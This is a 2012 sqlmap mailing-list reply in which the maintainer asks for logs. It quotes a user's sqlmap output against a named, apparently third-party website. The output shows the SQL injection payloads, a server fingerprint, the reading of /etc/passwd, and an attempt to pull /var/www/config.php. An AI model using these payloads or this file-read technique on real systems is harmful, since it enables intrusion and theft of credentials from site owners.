Re: [sqlmap-users] sqlmap --file-read error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] sqlmap --file-read error
|
From: Miroslav S. <mir...@gm...> - 2012-06-16 19:35:12
|
Hi Bob. Could you please send one of those problematic retrieved files? Also, traffic file would be nice (just append -t traffic.txt to a normal run) Kind regards, Miroslav Stampar On Jun 16, 2012 10:51 AM, "Bob" <sto...@qq...> wrote: > Hi all , > > i use file-read to retrieve file on server . > > /etc/passwd can workable > > but others response is as followed . > > 16:44:14] [INFO] resuming back-end DBMS 'mysql 5' from session file > [16:44:14] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: su_sd > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause (Generic > comment) > Payload: Fai=&SU=&nw=&su_sd=%' AND 5207=5207-- &pe=650 > > Type: UNION query > Title: MySQL UNION query (NULL) - 17 columns > Payload: Fai=&SU=&nw=&su_sd=%' LIMIT 1,1 UNION ALL SELECT NULL, > CONCAT(0x3a7a66623a,0x5a546342474b66515343,0x3a777a663a), NULL, NULL, NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, > NULL#&pe=650 > --- > > [16:44:16] [INFO] the back-end DBMS is MySQL > [16:44:16] [INFO] fetching banner > web server operating system: Linux Fedora 15 (Lovelock) > web application technology: PHP 5.3.8, Apache 2.2.17 > back-end DBMS: MySQL 5 > banner: '5.1.60' > > [16:44:16] [INFO] fingerprinting the back-end DBMS operating system > [16:44:16] [INFO] the back-end DBMS operating system is Linux > [16:44:16] [INFO] fetching file: '/var/www/config.php' > [16:44:16] [ERROR] for some reason(s) sqlmap retrieved an odd-length > hexadecimal string which it is not able to convert to raw string > /var/www/config.php file saved to: '/pentest/database/sqlmap/output/ > www.kangyang.com.tw/files/_var_www_config.php' > > [16:44:16] [INFO] fetched data logged to text files under > '/pentest/database/sqlmap/output/www.kangyang.com.tw' > > [*] shutting down at 16:44:16 > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
